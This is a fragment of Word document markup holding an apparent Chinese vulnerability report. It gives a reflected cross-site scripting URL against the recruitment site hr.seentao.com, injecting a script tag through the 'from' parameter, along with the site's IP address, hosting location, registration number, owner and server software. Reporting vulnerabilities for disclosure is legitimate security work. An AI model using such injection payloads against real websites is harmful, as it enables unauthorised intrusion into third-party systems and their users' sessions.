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注入网址:http://hr.seentao.com/platform/scrp/?from=XHSN&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>漏洞参数:from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0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站主页  http://hr.seentao.com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新道人才网</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>IP__坐标  浙江省杭州市 阿里云</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>所属__IP  39.107.214.200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>网站年龄  7年8月22天（创建于2011年08月11日,过期时间为2021年08月11日)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案编号  琼ICP备11002248号-3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新道科技股份有限公司</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t>备案时间  2018/11/5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text/html;charset=UTF-8  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ZhongHei"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">服务类型   Apache-Coyote/1.1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http://hr.seentao.com/platform/scrp/?from=XHSN&lt;/script&gt;"&gt;&lt;script&gt;prompt(1)&lt;/script&gt;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